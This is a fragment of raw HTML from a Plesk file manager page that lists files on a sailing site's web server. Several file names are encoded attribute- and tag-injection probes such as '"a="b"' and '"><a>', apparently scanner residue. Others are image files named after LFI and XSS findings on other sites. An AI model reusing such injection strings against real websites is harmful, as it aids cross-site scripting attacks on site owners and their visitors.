href="/plesk/client@2/domain@1/hosting/file-manager/view/?cmd=download&amp;file=%2520a%253db%25200fd28a9909b" onMouseOver="download_hint(event);" onMouseOut="z();" target=""><IMG src="/skins/default/plesk/icons/file_download.gif" width="16" height="16" alt="file_download.gif" title=""></a></td></tr><tr onMouseOver="Element.addClassName(this, &quot;current&quot;);" onMouseOut="Element.removeClassName( this, &quot;current&quot;);" onClick="var el = Event.element(event); if (&quot;TD&quot; == el.tagName) &#123; var inputElement = this.down(&quot;td.select input&quot;); if (inputElement) inputElement.click(); &#125;" class="evenrowbg"><td class="select"><input type="checkbox" class="checkbox" name="del[]" id="del_%20a%3db%202d0878db96d" value="%20a%3db%202d0878db96d" onClick="FileListSelectOnChange(this);"></td><td class="icon"><A name="2abfff8e531baa56c2aa8da2f0cc2708" id="2abfff8e531baa56c2aa8da2f0cc2708" onMouseOver="f(event, &#039;unknown_binary&#039;);" onMouseOut="z();"><IMG src="/skins/default/plesk/icons/file_binary.gif" width="16" height="16" alt="file_binary.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/edit/?cmd=edit&amp;file=%2520a%253db%25202d0878db96d" onClick="return bin();;lon();">%20a%3db%202d0878db96d</a></td><td class="number">217&nbsp;KB</td><td class="number">May 23, 2011 03:10 PM</td><td><A href="http://nosedivesailing.com/%20a%3db%202d0878db96d" onMouseOver="i(event);" onMouseOut="z();" target="_blank"><IMG src="/skins/default/plesk/icons/open_in_browser.gif" width="16" height="16" alt="open_in_browser.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/rename/?cmd=rename_file&amp;file=%2520a%253db%25202d0878db96d" onClick=";lon();" onMouseOver="e(event);" onMouseOut="z();" title="Rename file "><IMG src="/skins/default/plesk/icons/file_rename.gif" width="16" height="16" alt="file_rename.gif" title=""></a></td><td><A 
href="/plesk/client@2/domain@1/hosting/file-manager/permissions/?fname=C%3A%2FInetpub%2Fvhosts%2Fnosedivesailing.com%2Fhttpdocs%2F%2520a%253db%25202d0878db96d" onClick=";lon();" onMouseOver="d(event);" onMouseOut="z();" title="Change permissions for file "><IMG src="/skins/default/plesk/icons/permissions.gif" width="16" height="16" alt="permissions.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/view/?cmd=download&amp;file=%2520a%253db%25202d0878db96d" onMouseOver="download_hint(event);" onMouseOut="z();" target=""><IMG src="/skins/default/plesk/icons/file_download.gif" width="16" height="16" alt="file_download.gif" title=""></a></td></tr><tr onMouseOver="Element.addClassName(this, &quot;current&quot;);" onMouseOut="Element.removeClassName( this, &quot;current&quot;);" onClick="var el = Event.element(event); if (&quot;TD&quot; == el.tagName) &#123; var inputElement = this.down(&quot;td.select input&quot;); if (inputElement) inputElement.click(); &#125;" class="oddrowbg"><td class="select"><input type="checkbox" class="checkbox" name="del[]" id="del_%20a%3db%20c23f52e7ba1" value="%20a%3db%20c23f52e7ba1" onClick="FileListSelectOnChange(this);"></td><td class="icon"><A name="2abfff8e531baa56c2aa8da2f0cc2708" id="2abfff8e531baa56c2aa8da2f0cc2708" onMouseOver="f(event, &#039;unknown_binary&#039;);" onMouseOut="z();"><IMG src="/skins/default/plesk/icons/file_binary.gif" width="16" height="16" alt="file_binary.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/edit/?cmd=edit&amp;file=%2520a%253db%2520c23f52e7ba1" onClick="return bin();;lon();">%20a%3db%20c23f52e7ba1</a></td><td class="number">217&nbsp;KB</td><td class="number">May 23, 2011 03:09 PM</td><td><A href="http://nosedivesailing.com/%20a%3db%20c23f52e7ba1" onMouseOver="i(event);" onMouseOut="z();" target="_blank"><IMG src="/skins/default/plesk/icons/open_in_browser.gif" width="16" height="16" alt="open_in_browser.gif" title=""></a></td><td><A 
href="/plesk/client@2/domain@1/hosting/file-manager/rename/?cmd=rename_file&amp;file=%2520a%253db%2520c23f52e7ba1" onClick=";lon();" onMouseOver="e(event);" onMouseOut="z();" title="Rename file "><IMG src="/skins/default/plesk/icons/file_rename.gif" width="16" height="16" alt="file_rename.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/permissions/?fname=C%3A%2FInetpub%2Fvhosts%2Fnosedivesailing.com%2Fhttpdocs%2F%2520a%253db%2520c23f52e7ba1" onClick=";lon();" onMouseOver="d(event);" onMouseOut="z();" title="Change permissions for file "><IMG src="/skins/default/plesk/icons/permissions.gif" width="16" height="16" alt="permissions.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/view/?cmd=download&amp;file=%2520a%253db%2520c23f52e7ba1" onMouseOver="download_hint(event);" onMouseOut="z();" target=""><IMG src="/skins/default/plesk/icons/file_download.gif" width="16" height="16" alt="file_download.gif" title=""></a></td></tr><tr onMouseOver="Element.addClassName(this, &quot;current&quot;);" onMouseOut="Element.removeClassName( this, &quot;current&quot;);" onClick="var el = Event.element(event); if (&quot;TD&quot; == el.tagName) &#123; var inputElement = this.down(&quot;td.select input&quot;); if (inputElement) inputElement.click(); &#125;" class="evenrowbg"><td class="select"><input type="checkbox" class="checkbox" name="del[]" id="del_064a7066601" value="064a7066601" onClick="FileListSelectOnChange(this);"></td><td class="icon"><A name="2abfff8e531baa56c2aa8da2f0cc2708" id="2abfff8e531baa56c2aa8da2f0cc2708" onMouseOver="f(event, &#039;unknown_binary&#039;);" onMouseOut="z();"><IMG src="/skins/default/plesk/icons/file_binary.gif" width="16" height="16" alt="file_binary.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/edit/?cmd=edit&amp;file=064a7066601" onClick="return bin();;lon();">064a7066601</a></td><td class="number">217&nbsp;KB</td><td class="number">May 23, 2011 
03:10 PM</td><td><A href="http://nosedivesailing.com/064a7066601" onMouseOver="i(event);" onMouseOut="z();" target="_blank"><IMG src="/skins/default/plesk/icons/open_in_browser.gif" width="16" height="16" alt="open_in_browser.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/rename/?cmd=rename_file&amp;file=064a7066601" onClick=";lon();" onMouseOver="e(event);" onMouseOut="z();" title="Rename file "><IMG src="/skins/default/plesk/icons/file_rename.gif" width="16" height="16" alt="file_rename.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/permissions/?fname=C%3A%2FInetpub%2Fvhosts%2Fnosedivesailing.com%2Fhttpdocs%2F064a7066601" onClick=";lon();" onMouseOver="d(event);" onMouseOut="z();" title="Change permissions for file "><IMG src="/skins/default/plesk/icons/permissions.gif" width="16" height="16" alt="permissions.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/view/?cmd=download&amp;file=064a7066601" onMouseOver="download_hint(event);" onMouseOut="z();" target=""><IMG src="/skins/default/plesk/icons/file_download.gif" width="16" height="16" alt="file_download.gif" title=""></a></td></tr><tr onMouseOver="Element.addClassName(this, &quot;current&quot;);" onMouseOut="Element.removeClassName( this, &quot;current&quot;);" onClick="var el = Event.element(event); if (&quot;TD&quot; == el.tagName) &#123; var inputElement = this.down(&quot;td.select input&quot;); if (inputElement) inputElement.click(); &#125;" class="oddrowbg"><td class="select"><input type="checkbox" class="checkbox" name="del[]" id="del_1-lfi-mod.JPG" value="1-lfi-mod.JPG" onClick="FileListSelectOnChange(this);"></td><td class="icon"><A href="/plesk/client@2/domain@1/hosting/file-manager/view/?cmd=show&amp;file=1-lfi-mod.JPG" onClick=";lon();" onMouseOver="f(event, &#039;image&#039;);" onMouseOut="z();"><IMG src="/skins/default/plesk/icons/file_image.gif" width="16" height="16" alt="file_image.gif" 
title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/view/?cmd=show&amp;file=1-lfi-mod.JPG" onClick=";lon();">1-lfi-mod.JPG</a></td><td class="number">217&nbsp;KB</td><td class="number">May 23, 2011 02:35 PM</td><td><A href="http://nosedivesailing.com/1-lfi-mod.JPG" onMouseOver="i(event);" onMouseOut="z();" target="_blank"><IMG src="/skins/default/plesk/icons/open_in_browser.gif" width="16" height="16" alt="open_in_browser.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/rename/?cmd=rename_file&amp;file=1-lfi-mod.JPG" onClick=";lon();" onMouseOver="e(event);" onMouseOut="z();" title="Rename file "><IMG src="/skins/default/plesk/icons/file_rename.gif" width="16" height="16" alt="file_rename.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/permissions/?fname=C%3A%2FInetpub%2Fvhosts%2Fnosedivesailing.com%2Fhttpdocs%2F1-lfi-mod.JPG" onClick=";lon();" onMouseOver="d(event);" onMouseOut="z();" title="Change permissions for file "><IMG src="/skins/default/plesk/icons/permissions.gif" width="16" height="16" alt="permissions.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/view/?cmd=download&amp;file=1-lfi-mod.JPG" onMouseOver="download_hint(event);" onMouseOut="z();" target=""><IMG src="/skins/default/plesk/icons/file_download.gif" width="16" height="16" alt="file_download.gif" title=""></a></td></tr><tr onMouseOver="Element.addClassName(this, &quot;current&quot;);" onMouseOut="Element.removeClassName( this, &quot;current&quot;);" onClick="var el = Event.element(event); if (&quot;TD&quot; == el.tagName) &#123; var inputElement = this.down(&quot;td.select input&quot;); if (inputElement) inputElement.click(); &#125;" class="evenrowbg"><td class="select"><input type="checkbox" class="checkbox" name="del[]" id="del_1-lfi-mod.JPGfdf080d99066333a3eca3950" value="1-lfi-mod.JPGfdf080d99066333a3eca3950" onClick="FileListSelectOnChange(this);"></td><td 
class="icon"><A name="2abfff8e531baa56c2aa8da2f0cc2708" id="2abfff8e531baa56c2aa8da2f0cc2708" onMouseOver="f(event, &#039;unknown_binary&#039;);" onMouseOut="z();"><IMG src="/skins/default/plesk/icons/file_binary.gif" width="16" height="16" alt="file_binary.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/edit/?cmd=edit&amp;file=1-lfi-mod.JPGfdf080d99066333a3eca3950" onClick="return bin();;lon();">1-lfi-mod.JPGfdf080d99066333a3eca3950</a></td><td class="number">217&nbsp;KB</td><td class="number">May 23, 2011 02:35 PM</td><td><A href="http://nosedivesailing.com/1-lfi-mod.JPGfdf080d99066333a3eca3950" onMouseOver="i(event);" onMouseOut="z();" target="_blank"><IMG src="/skins/default/plesk/icons/open_in_browser.gif" width="16" height="16" alt="open_in_browser.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/rename/?cmd=rename_file&amp;file=1-lfi-mod.JPGfdf080d99066333a3eca3950" onClick=";lon();" onMouseOver="e(event);" onMouseOut="z();" title="Rename file "><IMG src="/skins/default/plesk/icons/file_rename.gif" width="16" height="16" alt="file_rename.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/permissions/?fname=C%3A%2FInetpub%2Fvhosts%2Fnosedivesailing.com%2Fhttpdocs%2F1-lfi-mod.JPGfdf080d99066333a3eca3950" onClick=";lon();" onMouseOver="d(event);" onMouseOut="z();" title="Change permissions for file "><IMG src="/skins/default/plesk/icons/permissions.gif" width="16" height="16" alt="permissions.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/view/?cmd=download&amp;file=1-lfi-mod.JPGfdf080d99066333a3eca3950" onMouseOver="download_hint(event);" onMouseOut="z();" target=""><IMG src="/skins/default/plesk/icons/file_download.gif" width="16" height="16" alt="file_download.gif" title=""></a></td></tr><tr onMouseOver="Element.addClassName(this, &quot;current&quot;);" onMouseOut="Element.removeClassName( this, &quot;current&quot;);" 
onClick="var el = Event.element(event); if (&quot;TD&quot; == el.tagName) &#123; var inputElement = this.down(&quot;td.select input&quot;); if (inputElement) inputElement.click(); &#125;" class="oddrowbg"><td class="select"><input type="checkbox" class="checkbox" name="del[]" id="del_1dac1%2522a%253d%2522b%2522064a7066601" value="1dac1%2522a%253d%2522b%2522064a7066601" onClick="FileListSelectOnChange(this);"></td><td class="icon"><A name="2abfff8e531baa56c2aa8da2f0cc2708" id="2abfff8e531baa56c2aa8da2f0cc2708" onMouseOver="f(event, &#039;unknown_binary&#039;);" onMouseOut="z();"><IMG src="/skins/default/plesk/icons/file_binary.gif" width="16" height="16" alt="file_binary.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/edit/?cmd=edit&amp;file=1dac1%252522a%25253d%252522b%252522064a7066601" onClick="return bin();;lon();">1dac1%2522a%253d%2522b%2522064a7066601</a></td><td class="number">217&nbsp;KB</td><td class="number">May 23, 2011 03:10 PM</td><td><A href="http://nosedivesailing.com/1dac1%2522a%253d%2522b%2522064a7066601" onMouseOver="i(event);" onMouseOut="z();" target="_blank"><IMG src="/skins/default/plesk/icons/open_in_browser.gif" width="16" height="16" alt="open_in_browser.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/rename/?cmd=rename_file&amp;file=1dac1%252522a%25253d%252522b%252522064a7066601" onClick=";lon();" onMouseOver="e(event);" onMouseOut="z();" title="Rename file "><IMG src="/skins/default/plesk/icons/file_rename.gif" width="16" height="16" alt="file_rename.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/permissions/?fname=C%3A%2FInetpub%2Fvhosts%2Fnosedivesailing.com%2Fhttpdocs%2F1dac1%252522a%25253d%252522b%252522064a7066601" onClick=";lon();" onMouseOver="d(event);" onMouseOut="z();" title="Change permissions for file "><IMG src="/skins/default/plesk/icons/permissions.gif" width="16" height="16" alt="permissions.gif" title=""></a></td><td><A 
href="/plesk/client@2/domain@1/hosting/file-manager/view/?cmd=download&amp;file=1dac1%252522a%25253d%252522b%252522064a7066601" onMouseOver="download_hint(event);" onMouseOut="z();" target=""><IMG src="/skins/default/plesk/icons/file_download.gif" width="16" height="16" alt="file_download.gif" title=""></a></td></tr><tr onMouseOver="Element.addClassName(this, &quot;current&quot;);" onMouseOut="Element.removeClassName( this, &quot;current&quot;);" onClick="var el = Event.element(event); if (&quot;TD&quot; == el.tagName) &#123; var inputElement = this.down(&quot;td.select input&quot;); if (inputElement) inputElement.click(); &#125;" class="evenrowbg"><td class="select"><input type="checkbox" class="checkbox" name="del[]" id="del_25e31e30568" value="25e31e30568" onClick="FileListSelectOnChange(this);"></td><td class="icon"><A name="2abfff8e531baa56c2aa8da2f0cc2708" id="2abfff8e531baa56c2aa8da2f0cc2708" onMouseOver="f(event, &#039;unknown_binary&#039;);" onMouseOut="z();"><IMG src="/skins/default/plesk/icons/file_binary.gif" width="16" height="16" alt="file_binary.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/edit/?cmd=edit&amp;file=25e31e30568" onClick="return bin();;lon();">25e31e30568</a></td><td class="number">217&nbsp;KB</td><td class="number">May 23, 2011 03:09 PM</td><td><A href="http://nosedivesailing.com/25e31e30568" onMouseOver="i(event);" onMouseOut="z();" target="_blank"><IMG src="/skins/default/plesk/icons/open_in_browser.gif" width="16" height="16" alt="open_in_browser.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/rename/?cmd=rename_file&amp;file=25e31e30568" onClick=";lon();" onMouseOver="e(event);" onMouseOut="z();" title="Rename file "><IMG src="/skins/default/plesk/icons/file_rename.gif" width="16" height="16" alt="file_rename.gif" title=""></a></td><td><A 
href="/plesk/client@2/domain@1/hosting/file-manager/permissions/?fname=C%3A%2FInetpub%2Fvhosts%2Fnosedivesailing.com%2Fhttpdocs%2F25e31e30568" onClick=";lon();" onMouseOver="d(event);" onMouseOut="z();" title="Change permissions for file "><IMG src="/skins/default/plesk/icons/permissions.gif" width="16" height="16" alt="permissions.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/view/?cmd=download&amp;file=25e31e30568" onMouseOver="download_hint(event);" onMouseOut="z();" target=""><IMG src="/skins/default/plesk/icons/file_download.gif" width="16" height="16" alt="file_download.gif" title=""></a></td></tr><tr onMouseOver="Element.addClassName(this, &quot;current&quot;);" onMouseOut="Element.removeClassName( this, &quot;current&quot;);" onClick="var el = Event.element(event); if (&quot;TD&quot; == el.tagName) &#123; var inputElement = this.down(&quot;td.select input&quot;); if (inputElement) inputElement.click(); &#125;" class="oddrowbg"><td class="select"><input type="checkbox" class="checkbox" name="del[]" id="del_2a790%253ca%253e05dd7ec7ca9" value="2a790%253ca%253e05dd7ec7ca9" onClick="FileListSelectOnChange(this);"></td><td class="icon"><A name="2abfff8e531baa56c2aa8da2f0cc2708" id="2abfff8e531baa56c2aa8da2f0cc2708" onMouseOver="f(event, &#039;unknown_binary&#039;);" onMouseOut="z();"><IMG src="/skins/default/plesk/icons/file_binary.gif" width="16" height="16" alt="file_binary.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/edit/?cmd=edit&amp;file=2a790%25253ca%25253e05dd7ec7ca9" onClick="return bin();;lon();">2a790%253ca%253e05dd7ec7ca9</a></td><td class="number">217&nbsp;KB</td><td class="number">May 23, 2011 03:10 PM</td><td><A href="http://nosedivesailing.com/2a790%253ca%253e05dd7ec7ca9" onMouseOver="i(event);" onMouseOut="z();" target="_blank"><IMG src="/skins/default/plesk/icons/open_in_browser.gif" width="16" height="16" alt="open_in_browser.gif" title=""></a></td><td><A 
href="/plesk/client@2/domain@1/hosting/file-manager/rename/?cmd=rename_file&amp;file=2a790%25253ca%25253e05dd7ec7ca9" onClick=";lon();" onMouseOver="e(event);" onMouseOut="z();" title="Rename file "><IMG src="/skins/default/plesk/icons/file_rename.gif" width="16" height="16" alt="file_rename.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/permissions/?fname=C%3A%2FInetpub%2Fvhosts%2Fnosedivesailing.com%2Fhttpdocs%2F2a790%25253ca%25253e05dd7ec7ca9" onClick=";lon();" onMouseOver="d(event);" onMouseOut="z();" title="Change permissions for file "><IMG src="/skins/default/plesk/icons/permissions.gif" width="16" height="16" alt="permissions.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/view/?cmd=download&amp;file=2a790%25253ca%25253e05dd7ec7ca9" onMouseOver="download_hint(event);" onMouseOut="z();" target=""><IMG src="/skins/default/plesk/icons/file_download.gif" width="16" height="16" alt="file_download.gif" title=""></a></td></tr><tr onMouseOver="Element.addClassName(this, &quot;current&quot;);" onMouseOut="Element.removeClassName( this, &quot;current&quot;);" onClick="var el = Event.element(event); if (&quot;TD&quot; == el.tagName) &#123; var inputElement = this.down(&quot;td.select input&quot;); if (inputElement) inputElement.click(); &#125;" class="evenrowbg"><td class="select"><input type="checkbox" class="checkbox" name="del[]" id="del_2ef80%2522%2520a%253db%2520c23f52e7ba1" value="2ef80%2522%2520a%253db%2520c23f52e7ba1" onClick="FileListSelectOnChange(this);"></td><td class="icon"><A name="2abfff8e531baa56c2aa8da2f0cc2708" id="2abfff8e531baa56c2aa8da2f0cc2708" onMouseOver="f(event, &#039;unknown_binary&#039;);" onMouseOut="z();"><IMG src="/skins/default/plesk/icons/file_binary.gif" width="16" height="16" alt="file_binary.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/edit/?cmd=edit&amp;file=2ef80%252522%252520a%25253db%252520c23f52e7ba1" onClick="return 
bin();;lon();">2ef80%2522%2520a%253db%2520c23f52e7ba1</a></td><td class="number">217&nbsp;KB</td><td class="number">May 23, 2011 03:09 PM</td><td><A href="http://nosedivesailing.com/2ef80%2522%2520a%253db%2520c23f52e7ba1" onMouseOver="i(event);" onMouseOut="z();" target="_blank"><IMG src="/skins/default/plesk/icons/open_in_browser.gif" width="16" height="16" alt="open_in_browser.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/rename/?cmd=rename_file&amp;file=2ef80%252522%252520a%25253db%252520c23f52e7ba1" onClick=";lon();" onMouseOver="e(event);" onMouseOut="z();" title="Rename file "><IMG src="/skins/default/plesk/icons/file_rename.gif" width="16" height="16" alt="file_rename.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/permissions/?fname=C%3A%2FInetpub%2Fvhosts%2Fnosedivesailing.com%2Fhttpdocs%2F2ef80%252522%252520a%25253db%252520c23f52e7ba1" onClick=";lon();" onMouseOver="d(event);" onMouseOut="z();" title="Change permissions for file "><IMG src="/skins/default/plesk/icons/permissions.gif" width="16" height="16" alt="permissions.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/view/?cmd=download&amp;file=2ef80%252522%252520a%25253db%252520c23f52e7ba1" onMouseOver="download_hint(event);" onMouseOut="z();" target=""><IMG src="/skins/default/plesk/icons/file_download.gif" width="16" height="16" alt="file_download.gif" title=""></a></td></tr><tr onMouseOver="Element.addClassName(this, &quot;current&quot;);" onMouseOut="Element.removeClassName( this, &quot;current&quot;);" onClick="var el = Event.element(event); if (&quot;TD&quot; == el.tagName) &#123; var inputElement = this.down(&quot;td.select input&quot;); if (inputElement) inputElement.click(); &#125;" class="oddrowbg"><td class="select"><input type="checkbox" class="checkbox" name="del[]" id="del_302br.net-xss-2.jpg" value="302br.net-xss-2.jpg" onClick="FileListSelectOnChange(this);"></td><td class="icon"><A 
href="/plesk/client@2/domain@1/hosting/file-manager/view/?cmd=show&amp;file=302br.net-xss-2.jpg" onClick=";lon();" onMouseOver="f(event, &#039;image&#039;);" onMouseOut="z();"><IMG src="/skins/default/plesk/icons/file_image.gif" width="16" height="16" alt="file_image.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/view/?cmd=show&amp;file=302br.net-xss-2.jpg" onClick=";lon();">302br.net-xss-2.jpg</a></td><td class="number">65.0&nbsp;KB</td><td class="number">May 23, 2011 03:10 PM</td><td><A href="http://nosedivesailing.com/302br.net-xss-2.jpg" onMouseOver="i(event);" onMouseOut="z();" target="_blank"><IMG src="/skins/default/plesk/icons/open_in_browser.gif" width="16" height="16" alt="open_in_browser.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/rename/?cmd=rename_file&amp;file=302br.net-xss-2.jpg" onClick=";lon();" onMouseOver="e(event);" onMouseOut="z();" title="Rename file "><IMG src="/skins/default/plesk/icons/file_rename.gif" width="16" height="16" alt="file_rename.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/permissions/?fname=C%3A%2FInetpub%2Fvhosts%2Fnosedivesailing.com%2Fhttpdocs%2F302br.net-xss-2.jpg" onClick=";lon();" onMouseOver="d(event);" onMouseOut="z();" title="Change permissions for file "><IMG src="/skins/default/plesk/icons/permissions.gif" width="16" height="16" alt="permissions.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/view/?cmd=download&amp;file=302br.net-xss-2.jpg" onMouseOver="download_hint(event);" onMouseOut="z();" target=""><IMG src="/skins/default/plesk/icons/file_download.gif" width="16" height="16" alt="file_download.gif" title=""></a></td></tr><tr onMouseOver="Element.addClassName(this, &quot;current&quot;);" onMouseOut="Element.removeClassName( this, &quot;current&quot;);" onClick="var el = Event.element(event); if (&quot;TD&quot; == el.tagName) &#123; var inputElement = 
this.down(&quot;td.select input&quot;); if (inputElement) inputElement.click(); &#125;" class="evenrowbg"><td class="select"><input type="checkbox" class="checkbox" name="del[]" id="del_302br.net-xss-2.jpgfdf080d93392bd957db5b4d5" value="302br.net-xss-2.jpgfdf080d93392bd957db5b4d5" onClick="FileListSelectOnChange(this);"></td><td class="icon"><A name="2abfff8e531baa56c2aa8da2f0cc2708" id="2abfff8e531baa56c2aa8da2f0cc2708" onMouseOver="f(event, &#039;unknown_binary&#039;);" onMouseOut="z();"><IMG src="/skins/default/plesk/icons/file_binary.gif" width="16" height="16" alt="file_binary.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/edit/?cmd=edit&amp;file=302br.net-xss-2.jpgfdf080d93392bd957db5b4d5" onClick="return bin();;lon();">302br.net-xss-2.jpgfdf080d93392bd957db5b4d5</a></td><td class="number">65.0&nbsp;KB</td><td class="number">May 23, 2011 02:35 PM</td><td><A href="http://nosedivesailing.com/302br.net-xss-2.jpgfdf080d93392bd957db5b4d5" onMouseOver="i(event);" onMouseOut="z();" target="_blank"><IMG src="/skins/default/plesk/icons/open_in_browser.gif" width="16" height="16" alt="open_in_browser.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/rename/?cmd=rename_file&amp;file=302br.net-xss-2.jpgfdf080d93392bd957db5b4d5" onClick=";lon();" onMouseOver="e(event);" onMouseOut="z();" title="Rename file "><IMG src="/skins/default/plesk/icons/file_rename.gif" width="16" height="16" alt="file_rename.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/permissions/?fname=C%3A%2FInetpub%2Fvhosts%2Fnosedivesailing.com%2Fhttpdocs%2F302br.net-xss-2.jpgfdf080d93392bd957db5b4d5" onClick=";lon();" onMouseOver="d(event);" onMouseOut="z();" title="Change permissions for file "><IMG src="/skins/default/plesk/icons/permissions.gif" width="16" height="16" alt="permissions.gif" title=""></a></td><td><A 
href="/plesk/client@2/domain@1/hosting/file-manager/view/?cmd=download&amp;file=302br.net-xss-2.jpgfdf080d93392bd957db5b4d5" onMouseOver="download_hint(event);" onMouseOut="z();" target=""><IMG src="/skins/default/plesk/icons/file_download.gif" width="16" height="16" alt="file_download.gif" title=""></a></td></tr><tr onMouseOver="Element.addClassName(this, &quot;current&quot;);" onMouseOut="Element.removeClassName( this, &quot;current&quot;);" onClick="var el = Event.element(event); if (&quot;TD&quot; == el.tagName) &#123; var inputElement = this.down(&quot;td.select input&quot;); if (inputElement) inputElement.click(); &#125;" class="oddrowbg"><td class="select"><input type="checkbox" class="checkbox" name="del[]" id="del_3e50b%2522%253e%253ca%253e8f0ee00628" value="3e50b%2522%253e%253ca%253e8f0ee00628" onClick="FileListSelectOnChange(this);"></td><td class="icon"><A name="2abfff8e531baa56c2aa8da2f0cc2708" id="2abfff8e531baa56c2aa8da2f0cc2708" onMouseOver="f(event, &#039;unknown_binary&#039;);" onMouseOut="z();"><IMG src="/skins/default/plesk/icons/file_binary.gif" width="16" height="16" alt="file_binary.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/edit/?cmd=edit&amp;file=3e50b%252522%25253e%25253ca%25253e8f0ee00628" onClick="return bin();;lon();">3e50b%2522%253e%253ca%253e8f0ee00628</a></td><td class="number">217&nbsp;KB</td><td class="number">May 23, 2011 03:09 PM</td><td><A href="http://nosedivesailing.com/3e50b%2522%253e%253ca%253e8f0ee00628" onMouseOver="i(event);" onMouseOut="z();" target="_blank"><IMG src="/skins/default/plesk/icons/open_in_browser.gif" width="16" height="16" alt="open_in_browser.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/rename/?cmd=rename_file&amp;file=3e50b%252522%25253e%25253ca%25253e8f0ee00628" onClick=";lon();" onMouseOver="e(event);" onMouseOut="z();" title="Rename file "><IMG src="/skins/default/plesk/icons/file_rename.gif" width="16" height="16" 
alt="file_rename.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/permissions/?fname=C%3A%2FInetpub%2Fvhosts%2Fnosedivesailing.com%2Fhttpdocs%2F3e50b%252522%25253e%25253ca%25253e8f0ee00628" onClick=";lon();" onMouseOver="d(event);" onMouseOut="z();" title="Change permissions for file "><IMG src="/skins/default/plesk/icons/permissions.gif" width="16" height="16" alt="permissions.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/view/?cmd=download&amp;file=3e50b%252522%25253e%25253ca%25253e8f0ee00628" onMouseOver="download_hint(event);" onMouseOut="z();" target=""><IMG src="/skins/default/plesk/icons/file_download.gif" width="16" height="16" alt="file_download.gif" title=""></a></td></tr><tr onMouseOver="Element.addClassName(this, &quot;current&quot;);" onMouseOut="Element.removeClassName( this, &quot;current&quot;);" onClick="var el = Event.element(event); if (&quot;TD&quot; == el.tagName) &#123; var inputElement = this.down(&quot;td.select input&quot;); if (inputElement) inputElement.click(); &#125;" class="evenrowbg"><td class="select"><input type="checkbox" class="checkbox" name="del[]" id="del_3M.COM-XSS-1.JPG" value="3M.COM-XSS-1.JPG" onClick="FileListSelectOnChange(this);"></td><td class="icon"><A href="/plesk/client@2/domain@1/hosting/file-manager/view/?cmd=show&amp;file=3M.COM-XSS-1.JPG" onClick=";lon();" onMouseOver="f(event, &#039;image&#039;);" onMouseOut="z();"><IMG src="/skins/default/plesk/icons/file_image.gif" width="16" height="16" alt="file_image.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/view/?cmd=show&amp;file=3M.COM-XSS-1.JPG" onClick=";lon();">3M.COM-XSS-1.JPG</a></td><td class="number">279&nbsp;KB</td><td class="number">May 23, 2011 02:35 PM</td><td><A href="http://nosedivesailing.com/3M.COM-XSS-1.JPG" onMouseOver="i(event);" onMouseOut="z();" target="_blank"><IMG src="/skins/default/plesk/icons/open_in_browser.gif" width="16" height="16" 
